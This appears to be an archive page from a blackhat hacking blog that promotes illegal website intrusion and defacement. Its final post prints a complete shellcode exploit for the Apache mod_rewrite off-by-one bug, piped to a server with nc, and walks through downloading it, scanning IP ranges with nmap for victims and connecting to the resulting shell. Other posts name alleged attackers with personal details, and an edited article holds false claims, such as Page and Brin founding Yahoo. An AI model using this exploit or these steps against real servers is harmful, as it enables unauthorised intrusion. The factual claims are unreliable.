Archive forTutorials

XSS Injection by SyntaxShadow

In this video the master hackers of SyntaxShadow demonstrate how to do injections using XSS Cross Site Scripting.

The SyntaxShadow are experts in the field of programming and hacking, and make videos demonstrating just how much hackers can do, in such little time.

For more hacking videos please visit our XSS Hacking Video page and the XSS WORM Hacker Video archives.

Comments

Hacking Google with 0day PHP Photo Exploit - Video Tutorial

Blackhat hacker penguinman2100 demonstrates how to hack google to upload any hacker files or pictures to any website using PHP Photo exploits.

The blackhat hacker penguinman2100 hacks into websites using this tutorial as you can see in our video.

He has illegally hacked into sites such as http://textideas.com and http://www.sq-bleiburg.at as he has proven with the access in this video.

Penguinman2100 writes on his cracker blog:

**NEWS: I have recently become intrested in “Google Hacking” now I know that sounds pretty bad but it isnt really. “Google Hacking” is basically accessing things on Google in which the average person cant do and in which some illegal activity can occur.

The blackhat hacker Penguinman2100 is also known as Zachary D., he is male and 19 years old, and he currently lives in Calgary, Alberta (Canada), where laws against blackhat hacking in google do not exist.

His hack partner SteveTheMaster (Steve Nahilian) also a blackhat and is a much dangerous hacker with advanced skills.

Zach~
Hello! we are hacking partners. my name is zach. im not as good as of a hacker as steve, but i’ll do my part.

Steve~
sup, i am Stevethemaster (click here to chat on AIM) from Steve Company, i am the king of goldfinger & Qcode64 hacking. i do every type of hacking known to hackers on da web, l00k 0ut 4 my vids. Zach is my hacking partner, he has a great mind on image hacks. we are from spiralmountain.co.uk

Thank you to Zachary D. and Steve the Master Hacker for producing these excellent hacking video tutorials to teach blackhats how to hack illegally into websites such as textideas.com. Please we are waiting for episode 2 of How to Hack Google! Keep up the good works and submit great hacking tutorials for our readers!

Comments (5)

0day Vulnerabilities For Sale - the new market for weaponized exploits

The following article was posted by (Paul Goebbels) to a security mailing list
Source : http://seclists.org/fulldisclosure/2007/Dec/0028.html
From: Goebbels Amadeus
Date: Sun, 2 Dec 2007 06:12:54 +0100 (CET)

Despite the misleading subject of my e-mail, I want to
bring to attention an important topic which hasn’t been
discussed enough among the security industry: the exploit
and vulnerability research market.
Since this might be a vastly secretive community, I will
introduce some of the members of this dramatically disturbing tale:
Since a few years ago, few companies emerged, who offer
rewards for exploit information and vulnerability research.
In the beginning, only iDefense (US-based) openly disclosed
its activities.
In the last 3-7 years we have seen ZDI (TippingPoint, now
3Com and soon its Chinese major shareholder..), WSLabi (the
failed attempt on creating an auction market model for these
sales) and Netragard (the old DMCA publicity stunt SNOsoft).
Now I’ll start telling a tale of distrust, lies, middle men
and other creatures of the infraworld…
Once upon a time, there was an increasingly powerful work
force capable of crafting weapons which existed only in a
digital world. This force didn’t have a name. They didn’t
pursue certifications. They were anonymous. But some realized
they also had the power of influencing people, controlling the
flow of information from anywhere at any time. Humanity has
seen for ages how the power of controlling information can
take down whole nations. Nowadays, in an open and free market,
the corporate world is nothing but a battlefield.
There’s no crimson tie. No blood escaping the bodies of its
soldiers. The soldiers are John Does, fighting for a decent
paycheck at any cost, selling out their spirits and time for
the corporate machine. Selling out their comrades and dignity.
Losing the values, principles and matter that make them human.
Unknowingly, they are becoming mere tools of few individuals
who have a neverending desire for fame and wealth.
Have you ever considered your future in their hands? You’ve
been working for 50 years, your liver and kidneys start failing,
creating visible symptoms, stains in your skin. You can’t handle
life in the same way anymore. For what? What have you done in
those 50 years but serving another man to become more wealthy
and over powered. The approaching day of your death and its
mere vision strikes you like a burning iron blade.
In this New Age battlefield, you can make a difference. A
talented youth started emerging and dedicated passionately to
fulfill its curiosity. Day after day, spending countless hours
in front of a machine. Understanding it’s inner design and
details, breaking it apart and reassembling it the way it wasn’t
meant to be assembled.
Some others dedicated painful discipline to physical work and
trained themselves for achieving perfection in both intellectual
and physical matters. Others fell in the way and never made it
to the final round.
After realizing they could not let the corporate world exhaust
them, they tried another way. The emerging market of digital
ammunition seemed to be a potential solution for their problems.
But, unbeknown to them, they were wrong. They didn’t think at
first glance of the impossibly huge amounts of lies and fallacies
they were about experience. Because in a world where you can
claim something while denying your obligation to prove it, the
only power that is left is that of common sense and intuition.
The ability to sense the deceitful and know the truthful.
Once day, our John Doe decided to approach an independent digital
weapons dealer, looking for better offers than those coming from
more established business men. He knew that more then business men,
they were only middle men. After numerous experiences with these
little twerps, he realized they were also abusing their condition.
John was also especially disappointed with the fact that in the
world of digital ammunitions, there’s no real way of providing the
goods without turning them instantly useless and vulnerable to abuse.
John knew that these middle men were taking cuts far higher than
their alleged 10 to 15 percent of the sale. How could John prove it
otherwise? There was no way of ensuring that their contacts were
getting the very exact figure John demanded.
Despite this fact, John also realized that in this market of smoke,
the seller is not supposed to set the price of the goods. These
middle men, in their great mistake of thinking that wisdom and
knowledge are the very same thing, wanted John to believe that
they were the ones who set the price of the goods.
John’s disappointment was growing to incredibly high stakes: “As a
child, whenever I tried to tell the candy shop clerk that the
chocolate bars cost as much as the peanut butter ones, he simply
tried to smack my head down. I wasn’t supposed to even swap the
labels in a failed attempt to fool this man, who had been making
candy bars for more time than I was actually able to barely say
my name.”
John had been crafting digital weapons for so many time, with
such a high talent and effectiveness, that he was much less
dispensable than this middle men. His personal background, of an
extremely tough childhood full of misery and hostility, also
gave him the necessary wisdom and experience in this world for
quickly spotting the weaknesses of these ego-crazed men. Their
weakness lies in the fact that without John and his comrades,
they have no business. They lack far more than just knowledge.
They lack wisdom, passion and truly devoted dedication to whatever
they do. Sooner or later they will make the same mistake of other
weapon dealers: getting killed with their own goods.
Hypocrisy among these poorly educated middle-men was so high,
that they resorted to low tricks and ridiculous attempts to gain
the trust of people like John. They went as far as insulting the
intelligence of those who provided them with the goods they are
unable to produce themselves. No matter how hard the tried, it
never brought anything back but silence. The silence that can be
clearly understood as a fully precise signal of genuine despise.
The fundamental error behind their approach is that trust can’t
be gained for cheering, boosting the ego, claiming great benefits
and wealth. Trust is something sculpted in hard rock, taking years
to become an admirable master piece. It doesn’t come attached to
an email.
At the end, John and his comrades found out that wasting their
time with these miserable beings was far less than fruitful. It
was exhausting them as much as the corporate world did. They
realized that any day above ground is a good day. Let the snakes
change their skin and show their true colors. In the desert,
being unable to match with environment has deadly consequences.
It might take years, or decades, but time will set them all where
they belong. Life does not forgive and everything has come to an
end… because they lack of patience, the end will approach their
nefarious activities sooner than they ever thought and John and
his comrades will be free again.
And this tale has to come to an end itself… the end of a
story about middle-men and their madness.
Time’s striking force.
- Paul Amadeus Goebbels

very interesting, mr goebbels.

Comments (5)

Video : Hackers can find hidden Google secrets

Blackhat demonstration video for Google hackers:

How to find hidden secret documents with Google

Comments (4)

NEW: How Hackers REALLY Work

Hacker Hierarchy

Psychologist and Expert Hacker Marc Rogers says there are several subgroups of hackers —

newbies, cyberpunks, coders and cyber terrorists.

Newbies are hackers who have access to hacking tools but aren’t really aware of how computers and programs work. Cyberpunks are savvier and are less likely to get caught than a newbie while hacking a system, but they have a tendency to boast about their accomplishments. Coders write the programs other hackers use to infiltrate and navigate computer systems. A cyber terrorist is a professional hacker who infiltrates systems for profit — he might sabotage a company or raid a corporation’s databases for proprietary information.

Hackers and Crackers

Many computer programmers insist that the word “hacker” applies only to law-abiding enthusiasts who help create programs and applications or improve computer security. Anyone using his or her skills maliciously isn’t a hacker at all, but a cracker.

Even if the so-called hackers using malicious hacking skills have always, and continue to label themselves and their peers as hackers first and foremost, the nomenclature does not legally apply according to the Arbitration of What Stuff is Called Act of 2002. In addition, loosely organized social groups and clubs have not traditionally been permitted to determine their own names or identities. All definitions related to hacking must be approved by at least one academic over the age of 55 years old in an authorative tone whilst speaking to a relatively-ignorant IT journalist about the latest sensationalized hacker story. - Ed.

Group of Hackers from KDE.ORG

 

Crackers infiltrate systems and cause mischief, or worse. Unfortunately, most people outside the hacker community use the word as a negative term because they don’t understand the distinction between hackers and crackers.

Spying on e-mail: Hackers have created code that lets them intercept and read e-mail messages — the Internet’s equivalent to wiretapping. Today, most e-mail programs use encryption formulas so complex that even if a hacker intercepts the message, he won’t be able to read it.

Hacker Culture

Individually, many hackers are antisocial. Their intense interest in computers and programming can become a communication barrier. Left to his or her own devices, a hacker can spend hours working on a computer program while neglecting everything else.

There are many websites dedicated to hacking. The hacker journal “2600: The Hacker Quarterly” has its own site, complete with a live broadcast section dedicated to hacker topics. The print version is still available on newsstands. Web sites like Hacker.org promote learning and include puzzles and competitions for hackers to test their skills.

Not all hackers try to explore forbidden computer systems. Some use their talents and knowledge to create better software and security measures. In fact, many hackers who once used their skills to break into systems now put that knowledge and ingenuity to use by creating more comprehensive security measures. In a way, the Internet is a battleground between different kinds of hackers — the bad guys, or black hats, who try to infiltrate systems or spread viruses, and the good guys, or white hats, who bolster security systems and develop powerful virus protection software.

Yahoo Hack Day

Glenn Chapman/AFP/Getty Images
Hackers work together to create “mashups” of Yahoo applications at Google Hack Day 2006.

Hacking For a Living

Hackers who obey the law can make a good living. Several companies hire hackers to test their security systems for flaws. Hackers can also make their fortunes by creating useful programs and applications, like Stanford University students Larry Page and Sergey Brin. Page and Brin worked together to create a search engine they would eventually name Yahoo. Today, they are tied for 26th place on Forbes’ list of the world’s most wealthy billionaires [source: Forbes].

 

Famous Hackers: Lamo

Adrian Lamo hacked into computer systems using computers at libraries and Internet cafes. He would explore high-profile systems for security flaws (such as open proxies), exploit the flaws (or make use of the proxy) to “hack” into the system, and then send a message to the corresponding company, letting them know about the security flaw. Unfortunately for Lamo, he was doing this on his own time rather than as a paid consultant — his activities were illegal. He also snooped around a lot, reading sensitive information and giving himself access to confidential material. He was caught after breaking into the computer system belonging to the New York Times.

It’s likely that there are thousands of hackers active online today, but an accurate count is impossible. Many (>99%) hackers don’t really know what they are doing — they’re just using dangerous tools they don’t completely understand.

 

Source: How Computer Hackers Really Work, by a Non Hacker

Comments (2)

How to Hack Tutorials - Hacking and Defacing Web Sites with Exploits

Today we have a very special post of a hacking tutorial by the blackhat hacker Sunjester

But first you must need to download the following hacking exploit:

http://www.milw0rm.com/exploits/2237
Ok so first we have step 1.

Code:

#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0×0834ae77 for any other version/system find it.
#
# Gulcas rulez :P 

echo -e “mod_rewrite apache off-by-one overflow”
echo    “by jack <jack\x40gulcas\x2eorg>\n\n”

if [ $# -ne 1 ] ; then
  echo “Usage: $0 webserver”
  exit
fi

host=$1

echo -ne “GET /kung/ldap://localhost/`perl -e ‘print “%90″x128′`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n” | nc $host 80

# milw0rm.com [2006-08-21]

Sunjester says:

that code runs from a unix shell. so, get into your favorite shell. this tutorial is for thoe who have no idea what to do, with that in mind, lets continue.
If you are stuck already and don’t know where to get shell, Sunjester recommends to you a backtrack attack:

if you are stuck already and dont know where to get orm how to use a shell, im using a livecd, backtrack. lets do the first thing and GET the exploit.

Step 2: we have to download it from milw0rm. - http://milworm.com

Figure 1: Wget exploit downloading tutorial:

Step 2: Sunjester says to all elitehacker student:

now we have to edit the file since it downloaded with some html. if you try to run the file now it will error, it will say soemthing like “Permission Denied

Example:

Sunjestre say we need to change the files permissions, because:

this aint windows this is a secure filesystem.

ok?

so lets chmod that badboy, might as well give it 777 since im root and its just a livecd. the 777 permission gives read/write/execute to the user, the group, and the owner of the file.

as i said, since im root, and its a friggin livecd, this will be fine.

you should never run scripts under root on your own box.

step 3:

now we can run the script, but we have to remove some stuff that wget put in there when we downloaded it, just some HTML. Open up vi and start replacing the html. you should only have to delete the top line and replace  the &quot with double quotes.

Sunjester: once your done you can save and quit vi or whatever editor you used and run it. should come out something liek below.

now that the script is working, lets look at some ways to find our target servers. we can use nmap and google. those are the two biggest ones i can think of and that i use myself.

you could target really any website

since we will scan a while range or IP addresses. so type something like ::

Sunjester says to start there (festival.com) and scan away.
remember to save logs so its easier to look through, you can just grep through your logs of the scans. below is an example of an nmap scan to gather information about whats on port 80. hopefully we can find some vulnerable ones in that range, if not, pick another hobby.

once you find one, we just run the exploit, lets check and see fi the exploit worked…

*** Note to readers: Unfortunately Sunjester has not included all of screenshots of hacking into FESTIVAL.COM  ***

And now we move on to the final part of hacking:

Step 5:

Sunjester says : ” sweet, netcat your way in :P this should be the end of the road. if yuo are still having probelsm running this small script, seek help. you need help.  “

With special thanks to http://elitehackers.info/?pwnd=true

Comments (5)

« Previous entries